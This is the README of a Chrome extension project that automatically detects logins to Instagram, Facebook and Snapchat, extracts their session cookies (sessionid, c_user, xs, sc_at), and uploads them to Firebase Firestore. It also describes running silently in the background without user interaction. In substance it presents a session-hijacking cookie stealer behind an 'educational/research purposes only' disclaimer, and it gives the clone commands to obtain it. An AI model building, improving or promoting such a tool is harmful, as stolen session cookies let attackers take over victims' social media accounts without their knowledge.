A powerful Chrome Extension that automatically detects when a user logs in, extracts their Session ID, and securely stores everything in Firebase Firestore. Ideal for developers working on automation, analytics, or user session management (educational/research purposes only).
- β Auto-detects Instagram, Facebook, and Snapchat logins
- π Extracts session cookies (like
sessionid,c_user,xs,sc_at, etc.) - βοΈ Stores all data securely in Firebase Firestore
- β‘ Built with Manifest V3 + modern ES Modules
- π§ Clean, modular code using background + content scripts
- π Runs silently in background without user interaction
SessionID-Public/
βββ icons/
β βββ 48.png # Toolbar icon (48x48)
β βββ 128.png # Chrome Web Store icon (128x128)
β
βββ background.js # Core logic to extract and save session cookies
βββ wake.js # Keeps the service worker alive (optional)
βββ firebase-init.js # Firebase config + initialization
βββ firebase-firestore.js # Modular Firestore SDK import
βββ manifest.json # Chrome extension config (Manifest V3)
βββ utils.js # Utility functions (if any)
βββ readme.md # You're reading this!
git clone https://github.com/avdeshjadon/SessionID-Public.git
cd sessionId-Public